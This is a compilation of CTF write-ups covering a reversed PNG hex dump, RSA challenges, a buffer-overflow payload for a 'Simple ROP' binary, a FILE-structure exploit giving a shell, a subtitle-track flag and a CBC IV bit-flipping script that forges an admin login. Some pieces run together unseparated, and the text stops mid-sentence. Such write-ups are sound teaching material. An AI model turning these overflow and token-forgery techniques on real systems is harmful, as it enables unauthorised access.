53 33 00 BC DE 82 D6 35 7B 66 14 0C 2D F8 3C 81 9F B7 E6 38 B3 BB 1F A7 07 96 38 B5 CC 5B 92 4D 07 A6 76 50 F6 FF 0E 2F F5 B4 34 CC E8 99 50 43 4C 1E B0 32 74 C6 E1 6F DF 8E 61 F7 6C 49 B0 A0 B0 52 5A 0C FA 74 EA 81 E3 43 15 BB 42 A2 D5 C3 D9 7B DB C7 39 E8 D9 3D F8 D7 CF 70 C9 4F ED 21 F0 FE 53 8D 77 7E 57 D1 DF FE 4C D2 70 63 2C 81 80 A6 97 A6 FA 81 4B AD 4A 2D D9 B1 F6 B2 1B 01 AF 0B D0 60 5A 34 6C B2 8E DD C4 AF 2F 99 E4 60 C6 95 23 2F 59 A0 A2 96 80 81 A0 AF 68 D1 F7 38 89 40 2F 77 13 87 B8 00 3C FB F3 F3 F3 E6 76 DF CC 36 AB C8 34 AC DF CD AA 71 E6 FD FB F7 FB 4E 26 B3 01 F5 BF 1C E4 17 5B FB 7A AC C5 98 13 6C E2 A3 46 22 08 1F B4 E8 EB 74 9A 0E 3A 6E 15 16 14 16 85 66 9B 0D 46 A5 FF 6B 92 78 5D EC 67 51 5C 6C A7 86 19 55 B7 C8 62 F1 71 76 C4 DF 51 92 2C 59 64 B4 CF C0 72 33 30 61 98 1D B6 CD FB 24 93 FA 40 07 26 1F 08 7C D8 30 33 E0 05 E3 48 7C 4F 74 2A 50 6A 2A 3C 87 49 8E AC 63 63 B2 80 C8 54 07 33 AE A4 38 B5 03 1F F2 12 88 A1 9B 65 D2 74 64 4C 7D 4F CE 65 D3 3D AA A4 67 AF 0E 59 C2 C6 2E AE 62 A2 86 D9 26 21 55 3A A4 37 59 33 B2 5F BF 1B 9A 50 43 8C 4D EC 7E D2 CB 4E 06 53 0B D2 53 F5 EC 5D CC 12 F0 FA 00 2C 28 2C AA DC CD F4 E8 19 86 8A D6 45 E1 55 65 AA 3E B8 9F 6F D5 1F 42 04 D9 8A E1 A0 5B B0 94 19 7D 7B 04 36 E2 1A 19 79 D1 68 95 DF 8A 31 A9 01 8D C6 9F CE 77 72 3C 9F 69 E4 BE 2E 6A 0D DC 28 9D 0A E4 DD 35 73 2A EF 78 71 93 B2 A5 34 A8 06 44 E6 5D 38 28 D5 99 1B 7B D0 92 A0 CF 69 34 32 A6 55 C9 9C 42 B5 97 D2 9A B5 F5 20 7E C8 02 25 A3 45 FB 49 A7 68 98 77 57 1F 7F 86 02 8B 9F 92 26 87 CC B8 E2 87 9B 49 33 98 59 96 51 CE 04 C0 BC 82 78 EF 92 61 96 80 D7 07 60 41 61 51 18 83 EA 6E 26 9E 5D 80 76 2F 0B 6F AD 04 CB 07 F7 4E B9 19 0A 67 B9 05 8B 98 D1 B7 3D A4 19 DE C2 CC 78 D1 68 15 F3 B6 82 88 87 79 23 A4 95 56 EC A2 66 E3 89 07 AE 13 EF 36 71 81 C8 4D 6B 47 DF 54 5F 42 4B 72 AA 73 16 B4 02 22 B3 2F 1C 7F 4C 94 D0 3A 36 C0 83 94 6D C3 A5 7F 28 96 D2 81 45 ED 8F 1F 3F B6 DA 6C 05 02 5E EF A2 DA 99 55 E7 F1 43 06 FE F9 E7 1F 66 BC 84 D9 ED 56 79 F1 38 AE 61 C0 17 08 98 BA 85 1F 94 56 33 F6 0D DC 26 33 CB 32 B2 2E 00 41 CF A2 EF 68 D4 F1 54 B4 9B F1 FC 2C A8 A3 A8 D6 1C B3 B9 44 A3 97 D0 C2 15 5E 2A 93 7F F0 4C 14 7D 07 C2 8C A9 6D 68 7A AC 5B 58 C4 8C BE DD C4 CF 9F 16 66 C9 8B 46 AB 98 77 19 0B 7E 0A D9 B7 6F E8 5C 28 D0 E2 CA C1 3D 8A E1 DD A6 A7 40 78 4B 12 DD 14 13 93 3B 55 97 44 2D 01 03 C1 B4 A5 C5 05 26 4D 02 2D CC A6 5B E7 E0 1A C1 AC 34 BE 7C F9 C2 4F 35 58 CA B1 87 2A 03 20 68 75 26 9E F7 F9 F9 D9 6C A0 AF 4C 75 A0 C1 96 0B 98 54 C0 EC 11 0D F3 72 52 3A 06 33 AE 30 75 8B F4 E0 81 AF F6 D8 EC 60 B2 17 02 6B 25 40 43 CB 69 53 42 EB AD 43 1B 40 BB 0E CB 4D 58 D0 88 BF 96 13 0C 60 DA 94 8D 61 9E 2B BC AA 4C 29 E2 64 2B 35 4B 04 B8 0B E5 C7 33 13 61 88 D6 07 E6 DE A2 25 52 15 5F 57 80 19 F3 A2 D1 2A E6 F5 D1 E9 8D 25 9D 3D 4C 8B 0B 55 C1 18 C5 6B 18 E8 2C 10 8F 69 F6 16 13 FD 8A A1 5A 02 BC 8B D9 8E CD 68 48 BB D9 C1 C8 C3 0A 2E 07 A4 FC 34 02 9E 6B 47 94 E0 CD 7B 67 41 B9 26 E8 F1 3A 2C 38 68 5D AB 37 9D 57 7D FB ED B7 4C 2A 30 03 C0 EB 0E 52 44 AA FA AA 65 25 98 DA A6 B5 18 42 22 DA 9F 96 0E 7E 2A 1D 9F 20 9E 9D 03 16 C0 66 76 F7 A9 8F E6 B1 E7 B5 E2 FE 0E AC 1C C0 EB 6E CA 49 55 36 26 B5 13 C6 B8 F4 A1 C4 07 88 D6 32 9F 49 E3 F0 FE 71 16 2D 91 AA 04 F3 A7 6C 86 5D 02 BB CC 60 5E 9B 9E 20 12 03 87 F4 5A C2 D4 1A B4 B8 30 5A 69 2B 0A 24 FA 57 D9 3E 26 7A C7 6B 8D AC 77 C2 FE 5A 78 C3 EC 60 E4 61 05 45 9F A3 C6 D6 09 64 C6 8E 28 C1 3B F7 4E A5 E4 C0 60 68 2A A5 88 81 21 63 D2 05 08 40 CA FA EB AF BF 98 5A 90 6C 3A C5 3B 96 93 72 A1 B9 59 66 EC BD 55 78 E7 24 26 17 07 D8 CC EE 86 FA 89 84 F1 08 76 1E DE D2 14 62 37 2C 65 EF C6 2E 9B 4B 4C BD E2 BF F0 F3 3E 51 7A 36 33 5E 96 C0 A4 41 FA 63 50 09 8B 58 19 95 0C DF 1B 65 5D CC 70 59 BC 6E F8 12 F3 66 4F 09 B8 44 75 5A C6 3D 4C A3 0B 4C EA 66 96 86 19 BC CD 31 65 77 E8 49 71 93 D7 B3 F1 71 96 49 05 CC 76 06 D9 AC DC 31 23 78 E7 AE E7 F2 6D 1E 5D 3F F9 77 3D 7C 64 EB D9 8A 01 7F 7B 1C 42 0D 2F B7 4C 72 F8 5C 03 65 32 AF 41 E7 C2 22 71 24 58 55 99 EF 88 6C E9 88 2B 78 7D 02 98 D5 AD 91 F0 0A B1 4F 81 8C 34 0F 37 47 28 C0 4A 00 BC BE 02 0F 66 C6 D6 7B 6B 96 05 78 7D 21 B5 0D 7C FC F8 B1 C7 45 0E BA 05 4B D9 35 7B 87 28 F7 5B 09 AF 70 4C DA 6A 18 F3 66 1C 32 83 78 4B 14 F7 B0 6F FC 8E B1 C8 FC DF B3 A3 34 EF 3F 60 BA 86 01 6B F0 F4 60 94 88 E3 AC C1 EC A9 4E CB 12 77 95 D9 D3 E6 16 18 20 0C 93 DD EB 23 52 2A 33 D8 8A 01 DC 9E 45 89 6C 57 97 41 A3 C6 08 32 EF E5 6E 9E 79 0D 5A CF 8E 66 43 80 99 71 65 85 DB CC 74 02 83 8D 1D 1C CB EA 4C 46 58 C9 22 14 06 6C 8A 02 F9 EA 98 D4 47 35 D8 31 CF C1 0C 47 35 94 A4 67 41 7B 98 74 A0 6D BB 61 65 EB AB 63 35 B5 DE A8 2A 9C A5 00 5E BF 64 8A 27 18 18 56 7F 78 E8 E9 59 59 1F 09 61 D3 F1 FE B3 42 C3 56 D3 3A 84 F7 54 17 3D C7 61 89 E3 65 FA AD D8 BE 30 ED 23 5B 7A 3D C7 2E 81 5D C6 64 21 34 D8 0C D0 A2 51 2C F3 2E B9 FC B4 D5 00 1A AD 5C D9 C4 0C 0F D8 26 7C A0 F1 35 32 06 B2 DC 79 60 68 B3 72 CA D1 DA B7 18 4F 4E C3 EB 36 F1 3A BD DC 58 00 E6 5D 69 9D 09 F8 CD 25 93 2E A4 B6 C5 AB AA 59 58 5D 80 D7 CB 60 35 B5 8A 98 F1 52 E1 98 D4 68 98 F7 84 83 1B B2 6C 7C 47 0F 85 D2 78 DD 6B 1A 67 98 5F 05 6F 96 9F 16 AF 4F D5 99 65 54 17 3D C7 B1 32 01 AF BB 99 B2 8E C1 B3 58 09 F6 7A CE 0E A9 C6 70 A7 5D 9D 51 0D 8F CC AB 15 9B 55 CA 4F 5B 0D A0 D1 81 67 3F C8 FC 8A D3 94 CE 42 73 27 A5 98 95 E5 F8 B3 E0 80 58 E1 2C 08 F6 C4 1D EF A3 19 AD 78 C7 EC 2B AD 33 01 DC 4B 8B 97 1E E0 1F 70 B7 4E F7 C3 9A D6 7B 21 AB 29 2A 6A CD 58 26 B5 1B E6 9D CD F7 12 3E 97 2B 8F A0 27 93 22 EE D3 A1 7E 5F 12 31 69 AE C5 FB 48 B3 01 81 CD 0E 58 E8 F8 44 E0 6D C7 7C 20 7B 3D 67 9F 54 57 E3 27 FC 93 D9 17 98 71 F9 C5 19 26 5D C9 2A B5 CF 20 0E 41 34 5A 1F 40 5A CC AF D8 AF 91 B3 EE 2B 89 37 3A 09 5A 5F 29 87 AA C5 3E 29 CD 48 B1 32 B1 E9 AC B4 BB 80 09 C9 D4 1A 34 7A F9 8C 78 C0 9E 55 95 05 EB 6A D6 10 AC 63 BD 17 B2 9A 97 B3 C2 1F E8 65 33 D6 12 01 AF 0B BC B3 F5 30 C5 1F C4 22 FC D1 5C AC 4F 34 9A ED B1 2C 74 BC 58 DE 76 B8 3D 65 58 C3 EC DE 21 D5 65 84 64 C6 05 1F D0 50 7E 12 B3 B2 FF 93 65 3C 71 CC 06 F0 FA E6 2C A9 B8 FF 45 0C 74 A2 59 06 04 9A B1 19 C5 A6 2C 90 AD 96 A1 A2 AC 76 63 DF 84 2C 1D 31 E0 60 74 66 29 EB BD D0 CF 9F 2A 59 5F 31 35 6C D8 90 92 4D F1 07 B1 88 FE A3 39 1A CD F6 58 16 3A 5E 2C 6F 3B DC 1E F8 7F B6 7E FD E5 97 5F 98 37 82 2D 70 59 44 F1 87 D5 3D 53 A6 B4 B4 94 2A B4 98 3D 1C FD 2C A9 18 83 D1 29 E3 71 87 B6 8E EC CE 0F 1F E0 02 93 1A D0 A8 61 D6 19 A3 0F 46 67 96 B2 DE 0B E3 C7 29 9F 82 19 5B 0D AB 16 FB B8 CE F3 66 E1 C8 75 F8 33 ED 66 7B 2C 0B 1D 2F 96 B7 75 7F 47 6B 32 03 4A 7B 38 ED 77 DF 7D C7 E2 DE BD FB FB EF BF 99 D1 41 A6 5E 46 F5 78 16 29 C1 2A D9 F7 7F 8A E4 98 65 4C 2A 30 03 C0 EB 9B B3 AA 62 1F 59 3A 87 F6 35 C1 27 EF 38 D7 4E 5E C2 EB 1A 41 F4 9F 12 AC 59 D6 4D BC B0 F5 2C D5 C8 D5 D3 39 E2 D5 60 63 0D 78 DD 86 76 B3 1D 83 85 8E 17 EB 57 ED 41 B8 2B 65 06 F6 CC 73 F8 2F 08 99 B4 45 55 C0 40 1C 1F AA 62 96 CD C4 D6 6B 68 9E F4 F8 81 D4 2D 65 61 80 F0 43 CB A4 37 43 7A F6 4D 8D B1 B0 BE B9 FC 5C 47 FC 42 54 FC E5 25 B2 CA 6F 89 27 72 F7 CE 11 B7 C4 9C 0A F0 BA 0D ED 4E 23 63 C1 42 33 A6 EA DB CC DB 8A 1E F1 DC 9C 75 1A 81 42 58 62 BB 5B FA BF 45 5A C4 64 3F F0 F8 A1 65 D2 9B E1 81 E2 6F FC 42 94 FF BA E2 08 98 6F 6F 70 53 2E 86 A0 AF 3C A0 8C 81 51 25 6B C9 4C CF 6F 01 1B 3B B6 5F FB 48 8B 72 5E 17 A0 46 BF 69 B9 FD 4C 9F EC 07 19 F6 60 80 D7 E2 7C C4 1B C7 94 7B 1C 14 C5 42 85 A8 41 47 E9 08 17 C9 2D 79 3D 09 2B 13 F0 7A 90 1E 25 DB 94 99 B4 B3 89 7F 80 0A 64 D5 AD 10 30 A3 67 51 5E 3E FB 2D 57 AE 92 B1 B7 4E EC A3 41 2E E6 4C FF BB 94 E0 21 F6 A6 E2 8E D0 51 3A C2 45 4F 60 DD C1 22 75 EC A7 F3 B7 80 CF 49 A9 64 2D A6 2B DC 92 01 2B 0F 6D 99 21 84 10 0D 18 2C EE 17 2E 16 A9 63 3F FD 5B B1 73 D2 AF 64 73 CF 66 E6 7B 0C 34 AC FC 79 3A E6 09 21 44 03 06 8B 37 F9 6E B3 91 BE 8A 7E B8 AD 58 C6 A6 9E CD 5D 2B CC 17 98 F2 8B 47 9D 26 09 21 36 49 E7 69 06 22 C9 D2 F7 60 CF 46 FF CB 1D 22 63 7E 7F 25 1D 96 7A 09 21 FA A9 2E E1 DF 8E 98 21 60 DA 23 3F E8 89 E2 1D 91 EC 0B 21 CE 42 EB 30 0A E9 B4 78 A5 F8 3F DF 7C F4 13 C5 DB 23 19 13 42 9C 8E EC 3D D8 A7 A7 A7 45 6F 93 9F 84 1D BF DC 21 12 92 31 21 C4 49 81 74 7D 7F F9 2F 5C 90 34 26 BD 52 4C C3 C0 EB 56 EB 45 48 C6 84 10 A7 E6 CB 97 2F FC F4 4A 89 7F 10 4E 6C A2 5E 13 42 88 7B 12 FF 20 9C D8 44 32 26 84 10 77 C3 BF 67 AF 13 C5 7D 48 C6 84 10 E2 6E 3C FA 2F 77 9C 01 C9 98 10 42 DC 8D 57 F3 CB 1D 77 44 32 26 84 10 F7 41 2F 77 4C 41 7D 27 84 10 F7 41 2F 77 4C 41 32 26 84 10 77 E0 F3 E7 CF A6 61 40 2F 77 1C 41 32 26 84 10 77 20 6D C5 00 93 C4 2E D4 7D 42 08 71 07 A8 60 FA 15 F5 C3 48 C6 84 10 E2 D6 E8 E5 8E 89 A8 07 85 10 E2 D6 E8 E5 8E 89 48 C6 84 10 E2 A6 E8 E5 8E B9 48 C6 84 10 E2 A6 E8 E5 8E B9 A8 13 85 10 E2 A6 3C 3D 3D 99 86 E9 E5 8E 29 48 C6 84 10 E2 A6 D8 3F B9 96 86 CD 42 32 26 84 10 E2 81 91 8C 09 21 84 78 60 24 63 42 08 21 1E 96 FF FE FB 1F 2E 17 B0 ED 3B 26 B4 B0 00 00 00 00 49 45 4E 44 AE 42 60 82``` Then, I am used the tool HxD for record my hex code in give elif->file.png because header than '89 50 4E 47 0D 0A 1A 0A'. Finally, in reversed the png, we find the flag easyctf{r3v3r5ed_4ensics}
Challenge: RSA 3----------------------------------------Category: Cryptography ----------------------------------------135 points---------------------------------------- ```Description: Written by blockingtheskyWe came across another message that follows the same cryptographic schema as those other RSA messages. Take a look and see if you can crack it. Hint: You might want to read up on how RSA works. File = rsa3 {N : e : c}{0x27335d21ca51432fa000ddf9e81f630314a0ef2e35d81a839584c5a7356b94934630ebfc2ef9c55b111e8c373f2db66ca3be0c0818b1d4eda7d53c1bd0067f66a12897099b5e322d85a8da45b72b828813af23L : 0x10001 : 0x9b9c138e0d473b6e6cf44acfa3becb358b91d0ba9bfb37bf11effcebf9e0fe4a86439e8217819c273ea5c1c5acfd70147533aa550aa70f2e07cc98be1a1b0ea36c0738d1c994c50b1bd633e3873fc0cb377e7L}``` ```python#!/usr/bin/env pythonimport libnum n = int('0x27335d21ca51432fa000ddf9e81f630314a0ef2e35d81a839584c5a7356b94934630ebfc2ef9c55b111e8c373f2db66ca3be0c0818b1d4eda7d53c1bd0067f66a12897099b5e322d85a8da45b72b828813af23',16)e = int('0x10001',16)c = int('0x9b9c138e0d473b6e6cf44acfa3becb358b91d0ba9bfb37bf11effcebf9e0fe4a86439e8217819c273ea5c1c5acfd70147533aa550aa70f2e07cc98be1a1b0ea36c0738d1c994c50b1bd633e3873fc0cb377e7',16) """ p and q find on FactorDB """p = 3423616853305296708261404925903697485956036650315221001507285374258954087994492532947084586412780869q = 3423616853305296708261404925903697485956036650315221001507285374258954087994492532947084586412780871 n=p*qphi=(p-1)*(q-1)d = libnum.modular.invmod(e, phi)print libnum.n2s(pow(c, d, n)) #easyctf{tw0_v3ry_merrry_tw1n_pr1m35!!_417c0d}```
Challenge: Simple ROP ----------------------------------------Category: Binary Exploitation ----------------------------------------120 points ---------------------------------------- ```Description: Written by r3ndom On the shell there is a folder /problems/simple-rop.Hint: Read flag.txt Files = Source and Binary``` ``` Csimple-rop.c #define _GNU_SOURCE#include <stdio.h>#include <stdlib.h>#include <sys/types.h> void print_flag();void what_did_you_say(); int main(int argc, char* argv[]){ gid_t gid = getegid(); setresgid(gid, gid, gid); what_did_you_say(); return 0;} void print_flag(){ system("cat flag.txt");} void what_did_you_say(){ char buff[64]; gets(buff); printf("You said: %s\n", buff);}``` ```shellgdb-peda$ p print_flag$1 = {<text variable, no debug info>} 0x804851a <print_flag> ===> address of 'print_flag' BUFFER = 64 TEST IN LOCAL: python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop ===> NO match ! python -c 'print "A"*68+"\x1a\x85\x04\x08"' | ./simple-rop ===> NO match ! python -c 'print "A"*72+"\x1a\x85\x04\x08"' | ./simple-rop ===> NO match ! python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop ===> MATCH !```
Challenge: RSA 1 ----------------------------------------Category: Cryptography ----------------------------------------50 points ---------------------------------------- ```Description: Written by neptuniaI found somebody's notes on their private RSA! Help me crack this. Hint: Go google RSA if you're stuck. File = ciphertest1.txt p: 33499881069427614105926941260008415630190853527846401734073924527104092366847259q: 34311544767652906613104559081988349779622789386528780506962212898921316785995851e: 65537c: 43465248299278658712013216049003172427898782261990372316282214376041873514481386908793943532363461126240609464283533882761307749486816342864113338277082746552``` ```python#!/usr/bin/env pythonimport libnum p = 33499881069427614105926941260008415630190853527846401734073924527104092366847259q = 34311544767652906613104559081988349779622789386528780506962212898921316785995851e = 65537c = 43465248299278658712013216049003172427898782261990372316282214376041873514481386908793943532363461126240609464283533882761307749486816342864113338277082746552 n=p*qphi=(p-1)*(q-1)d = libnum.modular.invmod(e, phi)print libnum.n2s(pow(c, d, n)) #easyctf{wh3n_y0u_h4ve_p&q_RSA_iz_ez_7829d89f}```
# engineOnline Author: meh@HITCON ### Description ```we decide to make our engineTest online at 202.120.7.199:24680 (with command "./engineTest none none none none")you can get the binary from the attachment of challenge engineTest libc.so.6```I cannot understand what this program is doing until my teammates Lucas and Lays solved the reverse part ... and still don't understand it clearly now. Briefly, this program writes memory according to **ip** and print memory according to **op**, we didn't use cp so it is omitted. And I got the read/write functions from my teammate Lucas. :P ### Exploit  This program allows us to write everywhere **below** input memory, so we make it big enough to be mapped above libc section. ``` +------------------+ | binary | |------------------| | // big gap // | |------------------| | input memory | |------------------| | libs | | & ld | | & gaps | | & tls | |------------------| | stack | |------------------| | | +------------------+```* Modify stderr with ip We modify the content of stderr and partial overwrite the vtable, make it points to a fake vtable with gets_plt, so that we can use the libc address to rewrite the stderr after we leak. * Leak with op After ip, we use op to leak libc address. * Exit and hijack control flow When exit, the _dl_fini will call _IO_flush_all_lockp, which will call functions of stderr which is changed to gets. * Rewrite stderr We can rewrite the stderr with address we leaked, make the function pointer points to system. * Get shell Finally, it will call system(stderr), and we make the stderr start with '/bin/sh', so it will become system('/bin/sh').
# OgrewatchForensics, 100 points >My friend was out watching ogres when he heard a strange sound. Could you figure out what it means? ogreman As part of this challenge we were given a video file. The file command on Linux identified the file as Matroska data file. Watching the video didn't reveal nothing. Neither did I find anything by listening the audio of the file with Audacity. Next step was to find new tools to study the file more thoroughly. I used the following Mkvtoolsnix (https://mkvtoolnix.download/) command to find some more information about this file:> mkvinfo ogreman From the output I could see that the file had three tracks: a video, an audio and a subs track.```|+ Segment tracks| + A track| + Track number: 1 (track ID for mkvmerge & mkvextract: 0)| + Track UID: 1| + Lacing flag: 0| + Language: und| + Codec ID: V_MPEG4/ISO/AVC| + Track type: video| + Default duration: 33.333ms (30.000 frames/fields per second for a video track)| + Video track| + Pixel width: 1156| + Pixel height: 720| + Display width: 1156| + Display height: 720| + Display unit: 3 (aspect ratio)| + CodecPrivate, length 44 (h.264 profile: Main @L4.0)| + A track| + Track number: 2 (track ID for mkvmerge & mkvextract: 1)| + Track UID: 2| + Lacing flag: 0| + Name: Stereo| + Language: und| + Codec ID: A_AAC| + Track type: audio| + Audio track| + Channels: 2| + Sampling frequency: 44100| + CodecPrivate, length 5| + A track| + Track number: 3 (track ID for mkvmerge & mkvextract: 2)| + Track UID: 3| + Lacing flag: 0| + Language: eng| + Default flag: 0| + Codec ID: S_TEXT/ASS| + Track type: subtitles| + CodecPrivate, length 481``` I wanted to extract those tracks to examine them closer. I used the following command to do that: > mkvextract tracks ogreman 0:video 1:audio 2:subs Out of these three files, the subs file was something new. Therefore, I looked into it first. The file included the following: ```Dialogue: 0,0:00:00.03,0:00:00.03,Default,,0,0,0,,e\NDialogue: 0,0:00:00.03,0:00:00.04,Default,,0,0,0,,a\NDialogue: 0,0:00:00.03,0:00:00.03,Default,,0,0,0,,s\NDialogue: 0,0:00:00.04,0:00:00.04,Default,,0,0,0,,y\NDialogue: 0,0:00:00.04,0:00:00.04,Default,,0,0,0,,c\NDialogue: 0,0:00:00.04,0:00:00.04,Default,,0,0,0,,t\NDialogue: 0,0:00:00.04,0:00:00.05,Default,,0,0,0,,f\NDialogue: 0,0:00:00.04,0:00:00.04,Default,,0,0,0,,{\NDialogue: 0,0:00:00.05,0:00:00.05,Default,,0,0,0,,s\NDialogue: 0,0:00:00.05,0:00:00.05,Default,,0,0,0,,u\NDialogue: 0,0:00:00.05,0:00:00.05,Default,,0,0,0,,b\NDialogue: 0,0:00:00.05,0:00:00.06,Default,,0,0,0,,s\NDialogue: 0,0:00:00.05,0:00:00.05,Default,,0,0,0,,_\NDialogue: 0,0:00:00.06,0:00:00.06,Default,,0,0,0,,r\NDialogue: 0,0:00:00.06,0:00:00.06,Default,,0,0,0,,_\NDialogue: 0,0:00:00.06,0:00:00.06,Default,,0,0,0,,b\NDialogue: 0,0:00:00.06,0:00:00.06,Default,,0,0,0,,3\NDialogue: 0,0:00:00.06,0:00:00.06,Default,,0,0,0,,t\NDialogue: 0,0:00:00.07,0:00:00.07,Default,,0,0,0,,t\NDialogue: 0,0:00:00.07,0:00:00.07,Default,,0,0,0,,3\NDialogue: 0,0:00:00.07,0:00:00.07,Default,,0,0,0,,r\NDialogue: 0,0:00:00.07,0:00:00.08,Default,,0,0,0,,_\NDialogue: 0,0:00:00.07,0:00:00.07,Default,,0,0,0,,t\NDialogue: 0,0:00:00.08,0:00:00.08,Default,,0,0,0,,h\NDialogue: 0,0:00:00.08,0:00:00.08,Default,,0,0,0,,@\NDialogue: 0,0:00:00.08,0:00:00.08,Default,,0,0,0,,n\NDialogue: 0,0:00:00.08,0:00:00.09,Default,,0,0,0,,_\NDialogue: 0,0:00:00.08,0:00:00.08,Default,,0,0,0,,d\NDialogue: 0,0:00:00.09,0:00:00.09,Default,,0,0,0,,u\NDialogue: 0,0:00:00.09,0:00:00.09,Default,,0,0,0,,b\NDialogue: 0,0:00:00.09,0:00:00.09,Default,,0,0,0,,5\NDialogue: 0,0:00:00.09,0:00:00.10,Default,,0,0,0,,}\N``` The flag was in the subs file. Only thing left to do was to extract the flag from the rest of the text. I used the following python script to get the flag:``` python flag = ''with open('subs', 'r') as infile: for line in infile: line = line.strip() if line.startswith('Dialogue') and line.endswith('\N'): flag += line.split(',')[-1].replace('\N', '') print flag``` The flag was: easyctf{subs_r_b3tt3r_th@n_dub5}
# Integrity (crypto) ##ENG[PL](#pl-version) In the task we get a service: ```python#!/usr/bin/python -u from Crypto.Cipher import AESfrom hashlib import md5from Crypto import Randomfrom signal import alarm BS = 16pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) unpad = lambda s : s[0:-ord(s[-1])] class Scheme: def __init__(self,key): self.key = key def encrypt(self,raw): raw = pad(raw) raw = md5(raw).digest() + raw iv = Random.new().read(BS) cipher = AES.new(self.key,AES.MODE_CBC,iv) return ( iv + cipher.encrypt(raw) ).encode("hex") def decrypt(self,enc): enc = enc.decode("hex") iv = enc[:BS] enc = enc[BS:] cipher = AES.new(self.key,AES.MODE_CBC,iv) blob = cipher.decrypt(enc) checksum = blob[:BS] data = blob[BS:] if md5(data).digest() == checksum: return unpad(data) else: return key = Random.new().read(BS)scheme = Scheme(key) flag = open("flag",'r').readline()alarm(30) print "Welcome to 0CTF encryption service!"while True: print "Please [r]egister or [l]ogin" cmd = raw_input() if not cmd: break if cmd[0]=='r' : name = raw_input().strip() if(len(name) > 32): print "username too long!" break if pad(name) == pad("admin"): print "You cannot use this name!" break else: print "Here is your secret:" print scheme.encrypt(name) elif cmd[0]=='l': data = raw_input().strip() name = scheme.decrypt(data) if name == "admin": print "Welcome admin!" print flag else: print "Welcome %s!" % name else: print "Unknown cmd!" break``` As can be seen we can either login or register.Loggin in as admin will give us the flag, so this is the ultimate goal.We can see that we can't register as `admin` because this is explicitly checked. Once we register we get as a result login token in the form `IV | AES_CBC(md5(login) | login)`. Since we can modify freely the IV, we can force the decoding of md5 checksum to any value we want.This is because in CBC block crypto the first decrypted block is `IV xor AES_decrypt(ciphertext[0])` and we know the value of `AES_decrypt(ciphertext[0])` because it is md5 of the login we provided.So in order to force k-th decoded byte to value `X` we simply need to modify k-th byte of IV to `IV[k] ^ md5(login)[k] ^ X`. As a result we can easily fool the md5 checksum and we can provide IV such that the decoded md5 checksum will be a checksum of `pad("admin")`. Now we need somehow to obtain ciphertext which will decode to `pad("admin")`.This is again quite simple, since we're dealing with block crypto and the login token does not contain any information about the length of the provided input (unlike in real HMAC).It means that we can remove some ciphertext blocks from the end and the decryption will still work just fine, assuming the padding is correct. So if we decide to encrypt login in a form of `pad("admin")+16_random_bytes`, the server will send us ciphertext of `pad(pad("admin")+16_random_bytes)`.And of course this translates to 3 ciphertext blocks in a form of `pad("admin")+16_random_bytes+PKCS_padding`.But as said before, we can simply remove the last 2 blocks of ask server to use only the first one, which decodes to `pad("admin")`! ```pythonimport hashlibfrom crypto_commons.netcat.netcat_commons import nc, send, receive_until_match BS = 16pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) def generate_payload(ct): stripped_ct = ct[:-64] # skip last 2 blocks, the PKCS padding and the dummy block target_md5 = hashlib.md5(pad("admin")).digest() # md5 we want to get from decryption source_md5 = hashlib.md5(pad(pad("admin") + ("a" * 16))).digest() # md5 the server calculated original_iv = stripped_ct[:32].decode("hex") new_iv = [] for i in range(len(original_iv)): new_iv.append(chr(ord(original_iv[i]) ^ ord(source_md5[i]) ^ ord(target_md5[i]))) iv = "".join(new_iv).encode("hex") payload = iv + stripped_ct[32:] return payload def main(): s = nc("202.120.7.217", 8221) print(receive_until_match(s, ".*ogin")) send(s, "r") send(s, pad("admin") + ("a" * 16)) print(receive_until_match(s, ".*secret:")) ct = s.recv(9999).split("\n")[1] send(s, "l") send(s, generate_payload(ct)) print(s.recv(9999)) print(s.recv(9999)) print(s.recv(9999)) main()``` And this gives us `flag{Easy_br0ken_scheme_cann0t_keep_y0ur_integrity}` ##PL version W zadaniu dostajemy dostęp do serwisu: ```python#!/usr/bin/python -u from Crypto.Cipher import AESfrom hashlib import md5from Crypto import Randomfrom signal import alarm BS = 16pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) unpad = lambda s : s[0:-ord(s[-1])] class Scheme: def __init__(self,key): self.key = key def encrypt(self,raw): raw = pad(raw) raw = md5(raw).digest() + raw iv = Random.new().read(BS) cipher = AES.new(self.key,AES.MODE_CBC,iv) return ( iv + cipher.encrypt(raw) ).encode("hex") def decrypt(self,enc): enc = enc.decode("hex") iv = enc[:BS] enc = enc[BS:] cipher = AES.new(self.key,AES.MODE_CBC,iv) blob = cipher.decrypt(enc) checksum = blob[:BS] data = blob[BS:] if md5(data).digest() == checksum: return unpad(data) else: return key = Random.new().read(BS)scheme = Scheme(key) flag = open("flag",'r').readline()alarm(30) print "Welcome to 0CTF encryption service!"while True: print "Please [r]egister or [l]ogin" cmd = raw_input() if not cmd: break if cmd[0]=='r' : name = raw_input().strip() if(len(name) > 32): print "username too long!" break if pad(name) == pad("admin"): print "You cannot use this name!" break else: print "Here is your secret:" print scheme.encrypt(name) elif cmd[0]=='l': data = raw_input().strip() name = scheme.decrypt(data) if name == "admin": print "Welcome admin!" print flag else: print "Welcome %s!" % name else: print "Unknown cmd!" break``` Jak łatwo zauważyć możemy się zalogować lub zarejetrować.Logowanie jako admin pozwoli uzyskać flagę i to jest naszym finalnym celem.Możemy zauważyć, że nie możemy zarejestrować się jako `admin` ponieważ jest to wyraźnie sprawdzane. Po rejestracji dostajemy token logowania w postaci `IV | AES_CBC(md5(login) | login)`. Ponieważ możemy dowolnie zmieniać IV, możemy wymusić dowolne dekodowanie wartości md5.Wynika to bezpośrednio z tego jak działa szyfr blokowy w trybie CBC - pierwszy dekodowany blok to `IV xor AES_decrypt(ciphertext[0])` a znamy wartość `AES_decrypt(ciphertext[0])`bo to md5 wyliczone z wprowadzonych przez nas danych.Więc żeby wymusić dekodowanie k-tego bajtu do wartości `X` musimy jedynie zmienić k-ty bajt IV na `IV[k] ^ md5(login)[k] ^ X` W efekcie możemy w prosty sposób oszukać checksume md5 i podać takie IV, że odkodowane md5 będzie zgodne z checksumą dla `pad("admin")`. Teraz potrzebujemy uzyskać ciphertext który zdekoduje się do `pad("admin")`.To znów jest dość proste, ponieważ mamy do czynienia z szyfrem blokowym a token logowania nie zawiera nigdzie informacji o długości wprowadzonych danych (w przeciwieństwie do prawdziwego HMAC).To oznacza, że możemy usunąć kilka bloków ciphertextu z końca a 